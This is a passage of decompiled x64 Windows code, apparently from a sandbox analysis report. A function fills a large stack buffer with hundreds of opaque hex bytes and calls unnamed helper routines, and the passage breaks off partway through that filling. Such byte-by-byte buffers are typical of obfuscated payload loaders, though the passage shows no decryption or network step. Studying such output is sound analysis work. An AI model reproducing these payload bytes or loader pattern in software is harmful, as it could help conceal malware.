				char _v2381;
				char _v2382;
				char _v2383;
				char _v2384;
				char _v2385;
				char _v2386;
				char _v2387;
				char _v2388;
				char _v2389;
				char _v2390;
				char _v2391;
				char _v2392;
				char _v2393;
				char _v2394;
				char _v2395;
				char _v2396;
				char _v2397;
				char _v2398;
				char _v2399;
				char _v2400;
				char _v2401;
				char _v2402;
				char _v2403;
				char _v2404;
				char _v2405;
				char _v2406;
				char _v2407;
				char _v2408;
				char _v2409;
				char _v2410;
				char _v2411;
				char _v2412;
				char _v2413;
				char _v2414;
				char _v2415;
				char _v2416;
				char _v2417;
				char _v2418;
				char _v2419;
				char _v2420;
				char _v2421;
				char _v2422;
				char _v2423;
				char _v2424;
				char _v2425;
				char _v2426;
				char _v2427;
				char _v2428;
				char _v2429;
				char _v2430;
				char _v2431;
				char _v2432;
				char _v2433;
				char _v2434;
				char _v2435;
				char _v2436;
				char _v2437;
				char _v2438;
				char _v2439;
				char _v2440;
				char _v2441;
				char _v2442;
				char _v2443;
				char _v2444;
				char _v2445;
				char _v2446;
				char _v2447;
				char _v2448;
				char _v2449;
				char _v2450;
				char _v2451;
				char _v2452;
				char _v2453;
				char _v2454;
				char _v2455;
				char _v2456;
				char _v2457;
				char _v2458;
				char _v2459;
				char _v2460;
				char _v2461;
				char _v2462;
				char _v2463;
				char _v2464;
				char _v2465;
				char _v2466;
				char _v2467;
				char _v2468;
				char _v2469;
				char _v2470;
				char _v2471;
				char _v2472;
				char _v2473;
				char _v2474;
				char _v2475;
				char _v2476;
				char _v2477;
				char _v2478;
				char _v2479;
				char _v2480;
				char _v2481;
				char _v2482;
				char _v2483;
				char _v2484;
				char _v2485;
				char _v2486;
				char _v2487;
				char _v2488;
				char _v2489;
				char _v2490;
				char _v2491;
				char _v2492;
				char _v2493;
				char _v2494;
				char _v2495;
				char _v2496;
				char _v2497;
				char _v2498;
				char _v2499;
				char _v2500;
				char _v2501;
				char _v2502;
				char _v2503;
				char _v2504;
				char _v2505;
				char _v2506;
				char _v2507;
				char _v2508;
				char _v2509;
				char _v2510;
				char _v2511;
				char _v2512;
				char _v2513;
				char _v2514;
				char _v2515;
				char _v2516;
				char _v2517;
				char _v2518;
				char _v2519;
				char _v2520;
				char _v2521;
				char _v2522;
				char _v2523;
				char _v2524;
				char _v2525;
				char _v2526;
				char _v2527;
				char _v2528;
				char _v2529;
				char _v2530;
				char _v2531;
				char _v2532;
				char _v2533;
				char _v2534;
				char _v2535;
				char _v2536;
				char _v2537;
				char _v2538;
				char _v2539;
				char _v2540;
				char _v2541;
				char _v2542;
				char _v2543;
				char _v2544;
				char _v2545;
				char _v2546;
				char _v2547;
				char _v2548;
				char _v2549;
				char _v2550;
				char _v2551;
				char _v2552;
				char _v2553;
				char _v2554;
				char _v2555;
				char _v2556;
				char _v2557;
				char _v2558;
				char _v2559;
				char _v2560;
				char _v2561;
				char _v2562;
				char _v2563;
				char _v2564;
				char _v2565;
				char _v2566;
				char _v2567;
				char _v2568;
				char _v2569;
				char _v2570;
				char _v2571;
				char _v2572;
				char _v2573;
				char _v2574;
				char _v2575;
				char _v2576;
				char _v2577;
				char _v2578;
				char _v2579;
				char _v2580;
				char _v2581;
				char _v2582;
				char _v2583;
				char _v2584;
				char _v2585;
				char _v2586;
				char _v2587;
				char _v2588;
				char _v2589;
				char _v2590;
				char _v2591;
				char _v2592;
				char _v2593;
				char _v2594;
				char _v2595;
				char _v2596;
				char _v2597;
				char _v2598;
				char _v2599;
				char _v2600;
				char _v2601;
				char _v2602;
				char _v2603;
				char _v2604;
				char _v2605;
				char _v2606;
				char _v2607;
				char _v2608;
				char _v2609;
				char _v2610;
				char _v2611;
				char _v2612;
				char _v2613;
				char _v2614;
				char _v2615;
				char _v2616;
				char _v2617;
				char _v2618;
				char _v2619;
				char _v2620;
				char _v2621;
				char _v2622;
				char _v2623;
				char _v2624;
				char _v2625;
				char _v2626;
				char _v2627;
				char _v2628;
				char _v2629;
				char _v2630;
				char _v2631;
				char _v2632;
				char _v2672;
				char _v2704;
				void* _v2736;
				char _v2752;
				signed long long _v2760;
				long long _v2768;
				char _v2776;
				signed int _v2780;
				intOrPtr _v2784;
				signed long long _v2792;
				signed char _v2796;
				signed char _v2800;
				signed char _v2804;
				signed char _v2808;
				signed int _t2669;
				signed long long _t2714;
				signed long long _t2715;
				long long _t2716;
				signed long long _t2748;

				_t2746 = __rdi;
				_t2703 = __edi;
				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				_t2714 =  *0xaede008; // 0x81ced31fdcd6
				_t2715 = _t2714 ^ _t2748;
				_v24 = _t2715;
				_v2784 = _a16;
				if (_v2784 == 1) goto 0xae73fee;
				goto 0xae793e5;
				_v2796 = 0;
				_v2800 = 0;
				_v2768 = 0;
				_v2792 = 0;
				E00007FFA7FFA0AE697DC(_a16, __rcx); // executed
				_v2792 = _t2715;
				if (_v2792 == 0) goto 0xae74039;
				r8d = 0x5f5e100;
				E00007FFA7FFA0AE66920(0x5f5e100, 0, __edi, __esp, _v2792, __rdx, __rdi, __r8);
				E00007FFA7FFA0AE693A8(_t2715, __rbx, _v2792, __rsi); // executed
				 *0xaedea20 = 0;
				 *0xaedea14 = 0;
				 *0xaedea24 = 0;
				 *0xaedea18 = 0;
				 *0xaedea1c = 0;
				 *0xaedea10 = 0;
				_v2632 = 0x62;
				_v2631 = 0xfa;
				_v2630 = 0x28;
				_v2629 = 0x18;
				_v2628 = 0x56;
				_v2627 = 0x18;
				_v2626 = 0x3d;
				_v2625 = 0x31;
				_v2624 = 0x39;
				_v2623 = 0x13;
				_v2622 = 0x33;
				_v2621 = 9;
				_v2620 = 5;
				_v2619 = 0x64;
				_v2618 = 0x18;
				_v2617 = 0x2d;
				_v2616 = 0x39;
				_v2615 = 0x32;
				_v2614 = 0xae;
				_v2613 = 0x33;
				_v2612 = 2;
				_v2611 = 0xdc;
				_v2610 = 0xf;
				_v2609 = 0xd9;
				_v2608 = 0x8a;
				_v2607 = 0x2c;
				_v2606 = 0x45;
				_v2605 = 0x26;
				_v2604 = 0x3c;
				_v2603 = 0x60;
				_v2602 = 0x69;
				_v2601 = 0xdb;
				_v2600 = 0x9e;
				_v2599 = 0x2e;
				_v2598 = 0xd5;
				_v2597 = 0x26;
				_v2596 = 0x26;
				_v2595 = 0x30;
				_v2594 = 0x3f;
				_v2593 = 0x22;
				_v2592 = 0xe6;
				_v2591 = 0xce;
				_v2590 = 0x3c;
				_v2589 = 0xe6;
				_v2588 = 0x4c;
				_v2587 = 0xd5;
				_v2586 = 0xb9;
				_v2585 = 0x39;
				_v2584 = 0xef;
				_v2583 = 0xdb;
				_v2582 = 0x81;
				_v2581 = 0x12;
				_v2580 = 0xc4;
				_v2579 = 0xb;
				_v2578 = 0xd7;
				_v2577 = 0x22;
				_v2576 = 0xdb;
				_v2575 = 2;
				_v2574 = 0xb8;
				_v2573 = 0x15;
				_v2572 = 0xa8;
				_v2571 = 2;
				_v2570 = 0x48;
				_v2569 = 0xb;
				_v2568 = 0x36;
				_v2567 = 0xaa;
				_v2566 = 0x3a;
				_v2565 = 0xde;
				_v2564 = 0x30;
				_v2563 = 0xcf;
				_v2562 = 0x15;
				_v2561 = 0xca;
				_v2560 = 0x30;
				_v2559 = 0xcc;
				_v2558 = 0x6b;
				_v2557 = 0xae;
				_v2556 = 0x69;
				_v2555 = 0xd3;
				_v2554 = 0x5a;
				_v2553 = 0xb1;
				_v2552 = 0x27;
				_v2551 = 0xe4;
				_v2550 = 0x28;
				_v2549 = 0xf6;
				_v2548 = 0x19;
				_v2547 = 0xb6;
				_v2546 = 0xf;
				_v2545 = 0x65;
				_v2544 = 0x7b;
				_v2543 = 0xf9;
				_v2542 = 0xa;
				_v2541 = 0x3d;
				_v2540 = 0x71;
				_v2539 = 0x89;
				_v2538 = 0x4e;
				_v2537 = 0x57;
				_v2536 = 0x40;
				_v2535 = 0xfb;
				_v2534 = 0x1b;
				_v2533 = 0xf1;
				_v2532 = 0x1c;
				_v2531 = 0x67;
				_v2530 = 0;
				_v2529 = 0x52;
				_v2528 = 0xa0;
				_v2527 = 0xd;
				_v2526 = 0x90;
				_v2525 = 0x40;
				_v2524 = 0x4e;
				_v2523 = 0;
				_v2522 = 0x6e;
				_v2521 = 0xbd;
				_v2520 = 0x66;
				_v2519 = 0x9b;
				_v2518 = 0x15;
				_v2517 = 0x74;
				_v2516 = 0x75;
				_v2515 = 0x58;
				_v2514 = 0xa1;
				_v2513 = 0x31;
				_v2512 = 0x8c;
				_v2511 = 8;
				_v2510 = 0x3c;
				_v2509 = 0x41;
				_v2508 = 0x5a;
				_v2507 = 0xf8;
				_v2506 = 0x1c;
				_v2505 = 0xa7;
				_v2504 = 1;
				_v2503 = 0x4d;
				_v2502 = 0x4a;
				_v2501 = 0x55;
				_v2500 = 0xf8;
				_v2499 = 0xef;
				_v2498 = 0xd5;
				_v2497 = 0x3f;
				_v2496 = 0x70;
				_v2495 = 0x6f;
				_v2494 = 0x7a;
				_v2493 = 0x59;
				_v2492 = 0x65;
				_v2491 = 0x4f;
				_v2490 = 0xb5;
				_v2489 = 0xe1;
				_v2488 = 0x80;
				_v2487 = 0x5e;
				_v2486 = 0x4d;
				_v2485 = 0x6e;
				_v2484 = 0x17;
				_v2483 = 0xa9;
				_v2482 = 0x16;
				_v2481 = 0x43;
				_v2480 = 0;
				_v2479 = 0x1c;
				_v2478 = 0x4a;
				_v2477 = 0x2f;
				_v2476 = 8;
				_v2475 = 0xa9;
				_v2474 = 0x3e;
				_v2473 = 7;
				_v2472 = 0x13;
				_v2471 = 0x6a;
				_v2470 = 0x1d;
				_v2469 = 0x25;
				_v2468 = 0x2a;
				_v2467 = 0xa1;
				_v2466 = 0x30;
				_v2465 = 0x60;
				_v2464 = 0x76;
				_v2463 = 0x5d;
				_v2462 = 0x57;
				_v2461 = 0x23;
				_v2460 = 0x7e;
				_v2459 = 0x9e;
				_v2458 = 0x2f;
				_v2457 = 0x49;
				_v2456 = 0x75;
				_v2455 = 0x70;
				_v2454 = 0x3c;
				_v2453 = 0x4d;
				_v2452 = 0x1e;
				_v2451 = 0xaa;
				_v2450 = 0x7b;
				_v2449 = 0x54;
				_v2448 = 0x53;
				_v2447 = 0x5c;
				_v2446 = 0x54;
				_v2445 = 0x6c;
				_v2444 = 0x6b;
				_v2443 = 0xb4;
				_v2442 = 0x20;
				_v2441 = 0x18;
				_v2440 = 0x1e;
				_v2439 = 0x21;
				_v2438 = 2;
				_v2437 = 8;
				_v2436 = 0xd;
				_v2435 = 0x95;
				_v2434 = 0x23;
				_v2433 = 0x6c;
				_v2432 = 8;
				_v2431 = 0x73;
				_v2430 = 0x27;
				_v2429 = 0x1e;
				_v2428 = 0x1a;
				_v2427 = 0xbd;
				_v2426 = 0x67;
				_v2425 = 0x7b;
				_v2424 = 0x7a;
				_v2423 = 1;
				_v2422 = 0x26;
				_v2421 = 0x34;
				_v2420 = 0x36;
				_v2419 = 0xb3;
				_v2418 = 0;
				_v2417 = 2;
				_v2416 = 0x5c;
				_v2415 = 0x57;
				_v2414 = 0x35;
				_v2413 = 0x4b;
				_v2412 = 0x3c;
				_v2411 = 0xd;
				_v2410 = 0xaa;
				_v2409 = 9;
				_v2408 = 2;
				_v2407 = 0x31;
				_v2406 = 0x5c;
				_v2405 = 0x1e;
				_v2404 = 0xaa;
				_v2403 = 0x7a;
				_v2402 = 0xe8;
				_v2401 = 0x29;
				_v2400 = 0x45;
				_v2399 = 0x40;
				_v2398 = 0x73;
				_v2397 = 0xed;
				_v2396 = 0x36;
				_v2395 = 0xf8;
				_v2394 = 0x54;
				_v2393 = 0x17;
				_v2392 = 0x23;
				_v2391 = 0x1d;
				_v2390 = 0xa0;
				_v2389 = 0x2b;
				_v2388 = 0xf2;
				_v2387 = 0x13;
				_v2386 = 0x3a;
				_v2385 = 0x25;
				_v2384 = 0x46;
				_v2383 = 0x89;
				_v2382 = 0x29;
				_v2381 = 0xca;
				_v2380 = 0xe;
				_v2379 = 0x4a;
				_v2378 = 0x30;
				_v2377 = 0x48;
				_v2376 = 0xb3;
				_v2375 = 2;
				_v2374 = 0xf0;
				_v2373 = 0x25;
				_v2372 = 0x15;
				_v2371 = 0x27;
				_v2370 = 0x4e;
				_v2369 = 0xfb;
				_v2368 = 0x61;
				_v2367 = 0x7e;
				_v2366 = 0x57;
				_v2365 = 0x1e;
				_v2364 = 0xe;
				_v2363 = 0x19;
				_v2362 = 3;
				_v2361 = 0xe1;
				_v2360 = 0x11;
				_v2359 = 0x1b;
				_v2358 = 6;
				_v2357 = 0xc;
				_v2356 = 0x4b;
				_v2355 = 0x19;
				_v2354 = 0x19;
				_v2353 = 0xee;
				_v2352 = 0x71;
				_v2351 = 0x24;
				_v2350 = 0x5a;
				_v2349 = 0x16;
				_v2348 = 0x37;
				_v2347 = 0x45;
				_v2346 = 0x2d;
				_v2345 = 0x8a;
				_v2344 = 0x2a;
				_v2343 = 0x43;
				_v2342 = 0x1a;
				_v2341 = 0x26;
				_v2340 = 2;
				_v2339 = 0x25;
				_v2338 = 0x19;
				_v2337 = 0x43;
				_v2336 = 0x89;
				_v2335 = 0x28;
				_v2334 = 0x4a;
				_v2333 = 2;
				_v2332 = 0x4d;
				_v2331 = 0x39;
				_v2330 = 0xe0;
				_v2329 = 0x30;
				_v2328 = 0x63;
				_v2327 = 0x22;
				_v2326 = 9;
				_v2325 = 0xb3;
				_v2324 = 1;
				_v2323 = 0xa6;
				_v2322 = 0x6e;
				_v2321 = 0x51;
				_v2320 = 0x36;
				_v2319 = 0x7e;
				_v2318 = 0x9e;
				_v2317 = 0x2e;
				_v2316 = 0xe9;
				_v2315 = 0x29;
				_v2314 = 0x42;
				_v2313 = 0x13;
				_v2312 = 0x4a;
				_v2311 = 0xad;
				_v2310 = 0x28;
				_v2309 = 0xb7;
				_v2308 = 0x1e;
				_v2307 = 0xc;
				_v2306 = 0x5d;
				_v2305 = 0x5c;
				_v2304 = 0xc7;
				_v2303 = 0x6f;
				_v2302 = 0xff;
				_v2301 = 0xb;
				_v2300 = 0x52;
				_v2299 = 0xa;
				_v2298 = 0x2c;
				_v2297 = 8;
				_v2296 = 0xa0;
				_v2295 = 0x2b;
				_v2294 = 0xc2;
				_v2293 = 5;
				_v2292 = 0x24;
				_v2291 = 0xb8;
				_v2290 = 0xe7;
				_v2289 = 0x49;
				_v2288 = 0x6c;
				_v2287 = 0x6e;
				_v2286 = 0xc3;
				_v2285 = 0x96;
				_v2284 = 0x1e;
				_v2283 = 0xff;
				_v2282 = 0x2a;
				_v2281 = 0xf;
				_v2280 = 0xd3;
				_v2279 = 0xbe;
				_v2278 = 0x9c;
				_v2277 = 0xf1;
				_v2276 = 0x21;
				_v2275 = 0x3c;
				_v2274 = 0x25;
				_v2273 = 0x16;
				_v2272 = 0xb4;
				_v2271 = 0xb1;
				_v2270 = 0x23;
				_v2269 = 0xe4;
				_v2268 = 8;
				_v2267 = 0xfe;
				_v2266 = 0x1d;
				_v2265 = 0xb2;
				_v2264 = 0x2f;
				_v2263 = 0xd5;
				_v2262 = 0xf8;
				_v2261 = 0x35;
				_v2260 = 0x7f;
				_v2259 = 0x31;
				_v2258 = 0x35;
				_v2257 = 0x18;
				_v2256 = 0x2a;
				_v2255 = 0x3f;
				_v2254 = 0xe9;
				_v2253 = 0x70;
				_v2252 = 0x7a;
				_v2251 = 0x7d;
				_v2250 = 0x26;
				_v2249 = 0xee;
				_v2248 = 0x2b;
				_v2247 = 0x4a;
				_v2246 = 0x2b;
				_v2245 = 0xc5;
				_v2244 = 0x15;
				_v2243 = 0x35;
				_v2242 = 0x7d;
				_v2241 = 0xbe;
				_v2240 = 0x5d;
				_v2239 = 0xb3;
				_v2238 = 0xdc;
				_v2237 = 0x8c;
				_v2236 = 0x6e;
				_v2235 = 0xff;
				_v2234 = 0xb;
				_v2233 = 0x7c;
				_v2232 = 0x56;
				_v2231 = 0x3c;
				_v2230 = 0xc9;
				_v2229 = 0x62;
				_v2228 = 0x18;
				_v2227 = 0x1d;
				_v2226 = 0x1f;
				_v2225 = 0xc;
				_v2224 = 0x99;
				_v2223 = 0x23;
				_v2222 = 0xe4;
				_v2221 = 9;
				_v2220 = 2;
				_v2219 = 0x7d;
				_v2218 = 0x73;
				_v2217 = 0xe7;
				_v2216 = 0x20;
				_v2215 = 0x8f;
				_v2214 = 0xb7;
				_v2213 = 0x2b;
				_v2212 = 0xd;
				_v2211 = 0x15;
				_v2210 = 0xc;
				_v2209 = 0x2a;
				_v2208 = 0x7f;
				_v2207 = 0x64;
				_v2206 = 0x74;
				_v2205 = 0xd3;
				_v2204 = 0x19;
				_v2203 = 0x4a;
				_v2202 = 0x47;
				_v2201 = 0x2f;
				_v2200 = 0xad;
				_v2199 = 0xb2;
				_v2198 = 0;
				_v2197 = 0xdb;
				_v2196 = 0x69;
				_v2195 = 0x6a;
				_v2194 = 0x5c;
				_v2193 = 0x26;
				_v2192 = 0xf7;
				_v2191 = 0x67;
				_v2190 = 0x7b;
				_v2189 = 0x7e;
				_v2188 = 0x31;
				_v2187 = 0x74;
				_v2186 = 0x98;
				_v2185 = 0x2e;
				_v2184 = 0xfd;
				_v2183 = 0;
				_v2182 = 2;
				_v2181 = 0x14;
				_v2180 = 0x69;
				_v2179 = 0xd7;
				_v2178 = 0x72;
				_v2177 = 0xb1;
				_v2176 = 0xac;
				_v2175 = 0x29;
				_v2174 = 0x69;
				_v2173 = 6;
				_v2172 = 0x5b;
				_v2171 = 0x3f;
				_v2170 = 0x64;
				_v2169 = 0x6d;
				_v2168 = 0x77;
				_v2167 = 0xfd;
				_v2166 = 0x3b;
				_v2165 = 0xd;
				_v2164 = 0x15;
				_v2163 = 0x41;
				_v2162 = 0xd5;
				_v2161 = 0xa6;
				_v2160 = 0x2c;
				_v2159 = 0xb1;
				_v2158 = 0x1b;
				_v2157 = 0xd5;
				_v2156 = 0xa9;
				_v2155 = 0x23;
				_v2154 = 0x4a;
				_v2153 = 0x72;
				_v2152 = 0x72;
				_v2151 = 0x48;
				_v2150 = 0x45;
				_v2149 = 0x25;
				_v2148 = 6;
				_v2147 = 0xe7;
				_v2146 = 0x22;
				_v2145 = 0x5e;
				_v2144 = 0x13;
				_v2143 = 0x13;
				_v2142 = 0xab;
				_v2141 = 0x39;
				_v2140 = 0xb7;
				_v2139 = 0x1d;
				_v2138 = 0x55;
				_v2137 = 0xb4;
				_v2136 = 0xc;
				_v2135 = 0xaf;
				_v2134 = 0x78;
				_v2133 = 1;
				_v2132 = 0x72;
				_v2131 = 0x77;
				_v2130 = 0xd4;
				_v2129 = 0x3f;
				_v2128 = 0x49;
				_v2127 = 0x6d;
				_v2126 = 0x67;
				_v2125 = 0xaa;
				_v2124 = 0xea;
				_v2123 = 0x22;
				_v2122 = 0xe6;
				_v2121 = 0x73;
				_v2120 = 0x54;
				_v2119 = 0x5f;
				_v2118 = 0x61;
				_v2117 = 0xb8;
				_v2116 = 0x44;
				_v2115 = 0xe;
				_v2114 = 0x1b;
				_v2113 = 0x21;
				_v2112 = 0xf;
				_v2111 = 0x9e;
				_v2110 = 5;
				_v2109 = 0xe7;
				_v2108 = 0x23;
				_v2107 = 0x4a;
				_v2106 = 0x7a;
				_v2105 = 0x2b;
				_v2104 = 0xc5;
				_v2103 = 0x1d;
				_v2102 = 0xdd;
				_v2101 = 0x89;
				_v2100 = 0x28;
				_v2099 = 0x4a;
				_v2098 = 0x5a;
				_v2097 = 0x30;
				_v2096 = 0x5f;
				_v2095 = 0x35;
				_v2094 = 0x74;
				_v2093 = 0xf;
				_v2092 = 0xd5;
				_v2091 = 0x32;
				_v2090 = 0x50;
				_v2089 = 0x64;
				_v2088 = 0x67;
				_v2087 = 0xc3;
				_v2086 = 0xf0;
				_v2085 = 0x12;
				_v2084 = 0xb4;
				_v2083 = 0x15;
				_v2082 = 0x4f;
				_v2081 = 0x5d;
				_v2080 = 5;
				_v2079 = 0xab;
				_v2078 = 0xd0;
				_v2077 = 0x87;
				_v2076 = 0x6a;
				_v2075 = 0x6d;
				_v2074 = 0x3f;
				_v2073 = 0x35;
				_v2072 = 0x5c;
				_v2071 = 0xe9;
				_v2070 = 0x7d;
				_v2069 = 0x89;
				_v2068 = 0x6e;
				_v2067 = 0x57;
				_v2066 = 0x4c;
				_v2065 = 0x70;
				_v2064 = 0xd3;
				_v2063 = 0;
				_v2062 = 0xbe;
				_v2061 = 0xa0;
				_v2060 = 0x2a;
				_v2059 = 0x76;
				_v2058 = 0x47;
				_v2057 = 0x4d;
				_v2056 = 0x50;
				_v2055 = 0x20;
				_v2054 = 0x4e;
				_v2053 = 0x24;
				_v2052 = 0xe3;
				_v2051 = 0x2e;
				_v2050 = 7;
				_v2049 = 0x7f;
				_v2048 = 0x67;
				_v2047 = 0x8b;
				_v2046 = 0x92;
				_v2045 = 0x10;
				_v2044 = 0xed;
				_v2043 = 0x38;
				_v2042 = 0x60;
				_v2041 = 0x16;
				_v2040 = 0x74;
				_v2039 = 0xa8;
				_v2038 = 0x1f;
				_v2037 = 0xbf;
				_v2036 = 0x1c;
				_v2035 = 0x58;
				_v2034 = 0xad;
				_v2033 = 5;
				_v2032 = 0xaf;
				_v2031 = 0x11;
				_v2030 = 0x1b;
				_v2029 = 0x42;
				_v2028 = 0x21;
				_v2027 = 0xb2;
				_v2026 = 0x3d;
				_v2025 = 0x67;
				_v2024 = 0xee;
				_v2023 = 0x71;
				_v2022 = 0x24;
				_v2021 = 0xa;
				_v2020 = 0x60;
				_v2019 = 0x64;
				_v2018 = 0x2f;
				_v2017 = 0x5e;
				_v2016 = 5;
				_v2015 = 0xe3;
				_v2014 = 0x33;
				_v2013 = 0x4a;
				_v2012 = 0x72;
				_v2011 = 0x26;
				_v2010 = 0xb7;
				_v2009 = 0x85;
				_v2008 = 0x6d;
				_v2007 = 0xc5;
				_v2006 = 0x20;
				_v2005 = 0x4a;
				_v2004 = 0x4a;
				_v2003 = 0x6b;
				_v2002 = 0xd2;
				_v2001 = 0x62;
				_v2000 = 0x50;
				_v1999 = 0xf;
				_v1998 = 0x1d;
				_v1997 = 0x55;
				_v1996 = 0xb4;
				_v1995 = 0xc;
				_v1994 = 0xaf;
				_v1993 = 0x78;
				_v1992 = 1;
				_v1991 = 0x72;
				_v1990 = 0x73;
				_v1989 = 0xd4;
				_v1988 = 0x26;
				_v1987 = 0x8d;
				_v1986 = 0x8a;
				_v1985 = 0x62;
				_v1984 = 0x71;
				_v1983 = 0x1f;
				_v1982 = 0x66;
				_v1981 = 0x6d;
				_v1980 = 0x33;
				_v1979 = 0x70;
				_v1978 = 0x27;
				_v1977 = 0xa4;
				_v1976 = 0x61;
				_v1975 = 0x24;
				_v1974 = 0xa;
				_v1973 = 0x32;
				_v1972 = 0x9b;
				_v1971 = 0xe9;
				_v1970 = 0x12;
				_v1969 = 0x74;
				_v1968 = 0xb;
				_v1967 = 0xd7;
				_v1966 = 0x61;
				_v1965 = 0xd6;
				_v1964 = 2;
				_v1963 = 0x4e;
				_v1962 = 0x50;
				_v1961 = 0x25;
				_v1960 = 2;
				_v1959 = 0x55;
				_v1958 = 0xb;
				_v1957 = 0x92;
				_v1956 = 0x2c;
				_v1955 = 0xdb;
				_v1954 = 0x7d;
				_v1953 = 0x72;
				_v1952 = 0x47;
				_v1951 = 0x58;
				_v1950 = 0x2a;
				_v1949 = 0x4d;
				_v1948 = 0x21;
				_v1947 = 0xf6;
				_v1946 = 0x33;
				_v1945 = 0xa1;
				_v1944 = 0xb;
				_v1943 = 0x39;
				_v1942 = 0x59;
				_v1941 = 0x6b;
				_v1940 = 0x21;
				_v1939 = 0x74;
				_v1938 = 0x43;
				_v1937 = 0xa5;
				_v1936 = 0x30;
				_v1935 = 0xee;
				_v1934 = 0x2a;
				_v1933 = 0x39;
				_v1932 = 0x70;
				_v1931 = 0x6f;
				_v1930 = 0x65;
				_v1929 = 0xbe;
				_v1928 = 0x4d;
				_v1927 = 0xd2;
				_v1926 = 0x3e;
				_v1925 = 0xe1;
				_v1924 = 0xf5;
				_v1923 = 0x51;
				_v1922 = 0xc9;
				_v1921 = 0x54;
				_v1920 = 0x61;
				_v1919 = 0x6e;
				_v1918 = 0x52;
				_v1917 = 0x2f;
				_v1916 = 0xc3;
				_v1915 = 0x16;
				_v1914 = 0x35;
				_v1913 = 6;
				_v1912 = 0xf;
				_v1911 = 0x16;
				_v1910 = 0x46;
				_v1909 = 0x6b;
				_v1908 = 0x5c;
				_v1907 = 0xde;
				_v1906 = 0xf5;
				_v1905 = 0x78;
				_v1904 = 8;
				_v1903 = 0x23;
				_v1902 = 0x74;
				_v1901 = 0x44;
				_v1900 = 0x29;
				_v1899 = 0xb9;
				_v1898 = 6;
				_v1897 = 0x5c;
				_v1896 = 0x3f;
				_v1895 = 0x59;
				_v1894 = 0xd3;
				_v1893 = 9;
				_v1892 = 0xcb;
				_v1891 = 0x26;
				_v1890 = 0x55;
				_v1889 = 0x59;
				_v1888 = 0x53;
				_v1887 = 0x2a;
				_v1886 = 0x3b;
				_v1885 = 0x7f;
				_v1884 = 0xea;
				_v1883 = 0x3d;
				_v1882 = 0x33;
				_v1881 = 0;
				_v1880 = 0x2a;
				_v1879 = 0xf8;
				_v1878 = 0x33;
				_v1877 = 4;
				_v1876 = 0x1b;
				_v1875 = 0xc0;
				_v1874 = 0x12;
				_v1873 = 0x43;
				_v1872 = 0x6f;
				_v1871 = 0x13;
				_v1870 = 0xe3;
				_v1869 = 0x9f;
				_v1868 = 0x5f;
				_v1867 = 0xa0;
				_v1866 = 0x4d;
				_v1865 = 0x6a;
				_v1864 = 0x6e;
				_v1863 = 0x7a;
				_v1862 = 0x2c;
				_v1861 = 0xe8;
				_v1860 = 0x69;
				_v1859 = 0x60;
				_v1858 = 6;
				_v1857 = 0xd3;
				_v1856 = 0xba;
				_v1855 = 0x3c;
				_v1854 = 0xc7;
				_v1853 = 0xe7;
				_v1852 = 0x18;
				_v1851 = 0x43;
				_v1850 = 0x1e;
				_v1849 = 4;
				_v1848 = 0x3e;
				_v1847 = 0x6d;
				_v1846 = 0x1e;
				_v1845 = 0x66;
				_v1844 = 0x62;
				_v1843 = 0x5a;
				_v1842 = 0x88;
				_v1841 = 0x3d;
				_v1840 = 0x6b;
				_v1839 = 0x77;
				_v1838 = 0x73;
				_v1837 = 0xa0;
				_v1836 = 0xa2;
				_v1835 = 0x74;
				_v1834 = 4;
				_v1833 = 0x6e;
				_v1832 = 0xf8;
				_v1831 = 0x65;
				_v1830 = 0xb9;
				_v1829 = 0x9e;
				_v1828 = 0x38;
				_v1827 = 0x68;
				_v1826 = 0x25;
				_v1825 = 0xe3;
				_v1824 = 0x56;
				_v1823 = 0x65;
				_v1822 = 0xa3;
				_v1821 = 0x53;
				_v1820 = 0x64;
				_v1819 = 0x4d;
				_v1818 = 0xac;
				_v1817 = 0x55;
				_v1816 = 0xb9;
				_v1815 = 0x2c;
				_v1814 = 0x19;
				_v1813 = 0xe5;
				_v1812 = 0x3c;
				_v1811 = 0xc4;
				_v1810 = 0x99;
				_v1809 = 0x4e;
				_v1808 = 0xff;
				_v1807 = 0x9c;
				_v1806 = 0x6b;
				_v1805 = 0x17;
				_v1804 = 0xf2;
				_v1803 = 0x2f;
				_v1802 = 0xe2;
				_v1801 = 0x11;
				_v1800 = 0xe6;
				_v1799 = 0x20;
				_v1798 = 0x6d;
				_v1797 = 0x67;
				_v1796 = 0xaa;
				_v1795 = 0xee;
				_v1794 = 0xe1;
				_v1793 = 0x38;
				_v1792 = 0x1b;
				_v1791 = 0x34;
				_v1790 = 0xe4;
				_v1789 = 0xeb;
				_v1788 = 0x71;
				_v1787 = 0x8d;
				_v1786 = 0x58;
				_v1785 = 0x8c;
				_v1784 = 0x93;
				_v1783 = 0xe6;
				_v1782 = 0x1a;
				_v1781 = 0x4e;
				_v1780 = 0x19;
				_v1779 = 0x37;
				_v1778 = 0x27;
				_v1777 = 0xdf;
				_v1776 = 0x2f;
				_v1775 = 0xb7;
				_v1774 = 0xdb;
				_v1773 = 0xe7;
				_v1772 = 2;
				_v1771 = 0x4f;
				_v1770 = 0x9e;
				_v1769 = 0xf1;
				_v1768 = 0xe0;
				_v1767 = 0x17;
				_v1766 = 0x25;
				_v1765 = 0xbc;
				_v1764 = 0xe;
				_v1763 = 0xd5;
				_v1762 = 0x26;
				_v1761 = 0x8b;
				_v1760 = 0xc;
				_v1759 = 0xd1;
				_v1758 = 0xec;
				_v1757 = 0x6d;
				_v1756 = 0x79;
				_v1755 = 0xf7;
				_v1754 = 0x15;
				_v1753 = 0x50;
				_v1752 = 0x9c;
				_v1751 = 0x42;
				_v1750 = 0xa3;
				_v1749 = 0xdb;
				_v1748 = 0x3a;
				_v1747 = 0x6a;
				_v1746 = 0x6d;
				_v1745 = 0x77;
				_v1744 = 0xfb;
				_v1743 = 0x20;
				_v1742 = 0x19;
				_v1741 = 0x74;
				_v1740 = 0xb9;
				_v1739 = 0x2e;
				_v1738 = 0x73;
				_v1737 = 0x64;
				_v1736 = 0x3c;
				_v1735 = 0x1f;
				_v1734 = 0xf5;
				_v1733 = 0x6e;
				_v1732 = 0x57;
				_v1731 = 0x6e;
				_v1730 = 0x52;
				_v1729 = 0x2e;
				_v1728 = 0xc3;
				_v1727 = 0x86;
				_v1726 = 0xda;
				_v1725 = 0x1b;
				_v1724 = 0xdc;
				_v1723 = 0x26;
				_v1722 = 0xf1;
				_v1721 = 0xfb;
				_v1720 = 0x17;
				_v1719 = 0xa3;
				_v1718 = 0xb4;
				_v1717 = 0x32;
				_v1716 = 0x4d;
				_v1715 = 0x22;
				_v1714 = 0xf9;
				_v1713 = 0xc;
				_v1712 = 0x22;
				_v1711 = 0x7d;
